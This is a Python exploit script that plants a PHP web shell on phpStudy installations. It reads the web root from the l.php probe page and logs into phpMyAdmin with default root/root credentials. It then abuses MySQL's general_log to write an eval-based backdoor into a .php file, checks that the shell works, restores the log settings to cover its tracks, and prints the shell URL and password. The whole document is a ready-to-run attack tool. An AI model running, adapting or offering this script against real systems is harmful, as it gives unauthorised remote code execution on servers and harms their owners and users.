#!/usr/bin/env python # -*- coding: utf-8 -*- # phpStudy Get WebShell import hashlib import re import requests import sys import time import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) shellpass = "123456" signature = hashlib.md5(b"POC").hexdigest() shellcode = "<?php echo @md5('POC');@eval($_POST['%s']);?>" % (shellpass,) shellname = str(int(time.time())) + ".php" def exploit(target): doc_root = get_doc_root(target) if not doc_root: return False shell = get_shell(target, doc_root) if not shell: return False else: return shell def get_doc_root(target): URL = target + "/l.php" try: r = requests.get(URL, verify=False, timeout=5) except requests.exceptions.RequestException as e: return False else: r.encoding = "utf-8" if sys.version_info.major == 2: m = re.search(r"<td>绝对路径</td>\s+<td>(.+)</td>".decode("utf_8"), r.text) else: m = re.search(r"<td>绝对路径</td>\s+<td>(.+)</td>", r.text) if not m: return False else: return m.group(1).replace("\\", "/") def get_shell(target, doc_root): URL_index = target + "/phpMyAdmin/index.php" URL_import = target + "/phpMyAdmin/import.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"} s = requests.Session() try: r = s.post(URL_index, data={"pma_username": "root", "pma_password": "root"}, headers=headers, verify=False, timeout=5) except requests.exceptions.RequestException as e: return False else: m = re.search(r"token = '(.+)';", r.text) if not m: return False else: token = m.group(1) try: related_to_general_log = True sql_query1 = "SHOW VARIABLES LIKE 'general_log%';" r1 = s.post(URL_import, data={"token": token, "sql_query": sql_query1}, headers=headers, verify=False, timeout=5) except requests.exceptions.RequestException as e: related_to_general_log = False try: sql_query2 = "SET GLOBAL general_log = ON;SET GLOBAL general_log_file = '%s/%s';SELECT '%s';" % (doc_root, shellname, shellcode) r2 = s.post(URL_import, data={"token": token, "sql_query": sql_query2}, headers=headers, verify=False, timeout=5) except requests.exceptions.RequestException as e: return False else: shell = check_shell(target) if not shell: return False else: if related_to_general_log: try: general_log, general_log_file = ("", "") general_log, general_log_file = re.findall(r'<td class="data grid_edit ">(.+)</td>', r1.text) except ValueError as e: sql_query3 = "SET GLOBAL general_log = OFF;" else: sql_query3 = "SET GLOBAL general_log = %s;SET GLOBAL general_log_file = '%s';" % (general_log, general_log_file.replace("\\", "\\\\")) finally: try: r3 = s.post(URL_import, data={"token": token, "sql_query": sql_query3}, headers=headers, verify=False, timeout=5) except requests.exceptions.RequestException as e: pass return shell def check_shell(target): URL = target + "/" + shellname try: r = requests.get(URL, verify=False, timeout=5) except requests.exceptions.RequestException as e: return False else: if signature not in r.text: return False else: return URL + ", " + shellpass def main(): try: target = sys.argv[1] except IndexError as e: print("phpStudy Get WebShell") else: result = exploit(target) print(result) if __name__ == "__main__": main()